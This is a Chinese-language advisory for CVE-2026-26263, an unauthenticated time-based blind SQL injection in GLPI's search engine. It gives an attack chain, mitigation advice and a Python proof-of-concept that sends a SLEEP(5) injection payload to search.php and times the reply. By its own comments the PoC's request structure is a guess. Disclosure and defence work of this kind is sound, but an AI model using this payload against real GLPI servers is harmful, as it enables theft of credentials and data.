CVE-2026-26263 GLPI搜索引擎SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-26263

漏洞类型

SQL注入

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GLPI

漏洞概述

GLPI是一款免费的资产和IT管理软件包。在11.0.0至11.0.6之前的版本中，其搜索引擎组件存在一个未经身份验证的基于时间的盲SQL注入漏洞。由于该漏洞无需认证即可利用，攻击者可以通过构造恶意的搜索请求，向后端数据库发送特定的SQL语句。利用基于时间的盲注技术，攻击者能够提取敏感信息、破坏数据完整性或导致服务拒绝。官方已在11.0.6版本中修复了此问题，建议受影响用户尽快升级。

技术细节

该漏洞源于GLPI搜索引擎在处理用户输入时未能充分过滤或参数化查询，导致攻击者可以将恶意SQL代码注入到后端查询逻辑中。由于漏洞类型为基于时间的盲注（Time-based Blind SQL Injection），攻击者无法直接从前端页面获取查询结果，而是通过观察数据库响应时间的变化来推断数据的真伪。具体利用时，攻击者通常会使用如`SLEEP()`、`WAITFOR DELAY`或`BENCHMARK()`等数据库特定函数。当注入的SQL条件判断为真时，数据库执行延迟操作，导致HTTP响应时间增加；反之则迅速返回。通过这种二分法或逐位推测的方式，攻击者可以逐个字节地提取数据库中的敏感信息，如管理员密码哈希、用户凭证、会话令牌或系统配置数据。鉴于该漏洞的CVSS评分为8.1，攻击向量为网络（AV:N），且无需用户交互和身份验证（PR:N, UI:N），这意味着攻击者可以通过互联网直接向目标服务器发起攻击，利用门槛较低。一旦成功利用，可能导致高机密性、完整性和可用性影响，造成严重的数据泄露、数据篡改甚至服务中断。

攻击链分析

STEP 1

侦察

攻击者识别互联网上暴露的GLPI系统，确认版本位于11.0.0至11.0.5之间。

STEP 2

构造载荷

攻击者针对搜索引擎接口，构造包含基于时间的盲SQL注入Payload的HTTP请求。

STEP 3

发送请求

无需登录认证，直接向目标服务器发送恶意请求，Payload中包含SLEEP()等延时函数。

STEP 4

分析响应

攻击者测量服务器的HTTP响应时间。如果响应时间明显增加（如超过5秒），则说明SQL语句被执行，漏洞存在。

STEP 5

数据窃取

利用布尔逻辑或逐位猜解，通过延时差异提取数据库中的管理员哈希、用户数据等敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

# Target URL configuration
# The vulnerability exists in the search engine, typically accessible via a specific endpoint.
# Replace 'http://target-glpi.com' with the actual target address.
target_url = "http://target-glpi.com/front/search.php"

# Payload demonstrating time-based blind SQL injection
# This payload attempts to check if the database waits for 5 seconds.
# Adjust the parameter names based on the actual request structure captured via Burp Suite or proxy.
payload = {
    "criteria": {
        "0": {
            "field": "1", 
            "searchtype": "contains", 
            "value": "test' AND (SELECT SLEEP(5))-- "
        }
    }
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/json"
}

try:
    start_time = time.time()
    # Sending the request (Note: parameter structure may vary, check actual traffic)
    response = requests.get(target_url, params=payload, headers=headers, timeout=10)
    end_time = time.time()
    
    response_time = end_time - start_time
    
    if response_time > 5:
        print(f"[+] Vulnerability Confirmed! Response time: {response_time:.2f}s")
    else:
        print(f"[-] Not detected or patched. Response time: {response_time:.2f}s")
        
except requests.exceptions.RequestException as e:
    print(f"Error connecting to target: {e}")

影响范围

GLPI 11.0.0

GLPI 11.0.1

GLPI 11.0.2

GLPI 11.0.3

GLPI 11.0.4

GLPI 11.0.5

防御指南

临时缓解措施

如果无法立即升级，建议通过防火墙规则限制对GLPI系统的网络访问，特别是禁止外部网络直接访问搜索接口。同时，应检查并加强输入参数的过滤机制，拦截包含单引号、注释符（如--）及特定SQL函数（如SLEEP, BENCHMARK）的恶意请求，并密切关注数据库的异常慢查询日志。